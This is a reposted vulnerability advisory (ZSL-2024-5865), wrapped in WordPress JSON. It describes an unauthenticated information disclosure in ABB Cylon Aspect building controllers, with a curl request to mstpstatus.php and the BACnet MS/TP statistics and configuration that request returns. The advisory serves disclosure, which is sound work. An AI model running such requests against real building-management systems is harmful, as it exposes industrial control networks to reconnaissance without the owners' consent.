ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure<\/p>\n
Vendor: ABB Ltd.
Product web page: https:\/\/www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01<\/p>\n
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.<\/p>\n
Desc: The ABB BMS\/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various BACnet MS\/TP statistics running on the device.<\/p>\n
Tested on: GNU\/Linux 3.15.10 (armv7l)
GNU\/Linux 3.10.0 (x86_64)
GNU\/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP\/7.3.11
PHP\/5.6.30
PHP\/5.4.16
PHP\/4.4.8
PHP\/5.3.3
AspectFT Automation Application Server
lighttpd\/1.4.32
lighttpd\/1.4.18
Apache\/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)<\/p>\n
Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience<\/p>\n
Advisory ID: ZSL-2024-5865
Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5865.php<\/p>\n
21.04.2024<\/p>\n
—<\/p>\n
$ cat project<\/p>\n
P R O J E C T<\/p>\n
.|
| |
|’| ._____
___ | | |. |’ .—“|
_ .-‘ ‘-. | | .–‘| || | _| |
.-‘| _.| | || ‘-__ | | | || |
|’ | |. | || | | | | || |
____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2592\u2593\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <\/p>\n
$ curl http:\/\/192.168.73.31\/mstpstatus.php
Thu Nov 28 10:13:51 UTC 2024<br><div id=’Port 0Stat’ class=’portStats’><div id=’Port 0Load’>Port 0 Load: 123 Average time (ms) to wait for token return
47 Average time (ms) to wait for for a reply
20 Max info frames
1063 Estimated time for max_nfo_frmaes tx plus token cycle (ms)
18 Estimated max rate (trasactions per sec)
38 congestion threashold
%<\/div><div id=’Port 0BPSTotal’>Port 0 BPS (Total): <\/div><div id=’Port 0BPSOurs’>Port 0 BPS (Mine): <\/div><\/div><div id=’Port 1Stat’ class=’portStats’><div id=’Port 1Load’>Port 1 Load: 34 Average time (ms) to wait for token return
40 Average time (ms) to wait for for a reply
20 Max info frames
834 Estimated time for max_nfo_frmaes tx plus token cycle (ms)
23 Estimated max rate (trasactions per sec)
48 congestion threashold
%<\/div><div id=’Port 1BPSTotal’>Port 1 BPS (Total): <\/div><div id=’Port 1BPSOurs’>Port 1 BPS (Mine): <\/div><\/div><br \/>
$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ <br \/>
Proto: 0<br \/>
<br \/>
Port 0 Statistics =======================<br \/>
Baud Rate: 38400<br \/>
RX Characters: 60521<br \/>
RX echoes: 0<br \/>
RX Errors: 31<br \/>
TX Characters: 49671<br \/>
Echo detect fails: 0<br \/>
<br \/>
Port 0 MSTP State =======================<br \/>
ValidRXFrameCnt: 42320<br \/>
InvdRXFrameCnt: 61<br \/>
rxDataFrames: 16558<br \/>
rxToken: 29242<br \/>
TXFrameCnt: 2072<br \/>
TXQueCnt: 1<br \/>
CongestionCnt: 0<br \/>
Poll_Station: 0<br \/>
SoleMaster: FALSE<br \/>
<br \/>
Port 0 config =======================<br \/>
Nmax_master: 127<br \/>
Nmax_info_frames: 20<br \/>
This_Station: 0<br \/>
Tno_token: 500<br \/>
Tusage timeout 30<br \/>
congestion (auto): 38<br \/>
Npoll: 50<br \/>
<br \/>
<br \/>
Port 1 Statistics =======================<br \/>
Baud Rate: 38400<br \/>
RX Characters: 0<br \/>
RX echoes: 0<br \/>
RX Errors: 0<br \/>
TX Characters: 33632<br \/>
Echo detect fails: 0<br \/>
<br \/>
Port 1 MSTP State =======================<br \/>
ValidRXFrameCnt: 0<br \/>
InvdRXFrameCnt: 0<br \/>
rxDataFrames: 0<br \/>
rxToken: 0<br \/>
TXFrameCnt: 2<br \/>
TXQueCnt: 0<br \/>
CongestionCnt: 0<br \/>
Poll_Station: 29<br \/>
SoleMaster: TRUE<br \/>
<br \/>
Port 1 config =======================<br \/>
Nmax_master: 127<br \/>
Nmax_info_frames: 20<br \/>
This_Station: 0<br \/>
Tno_token: 500<br \/>
Tusage timeout 30<br \/>
congestion (auto): 48<br \/>
Npoll: 50<br \/>
<br \/><\/p>\n","protected":false},"excerpt":{"rendered":"
ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure Vendor: ABB Ltd.Product web page: https:\/\/www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-StudioFirmware: <=3.08.01 Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices. Desc: The ABB BMS\/BAS controller suffers from …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60570","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60570","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60570"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60570\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60570"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60570"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60570"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}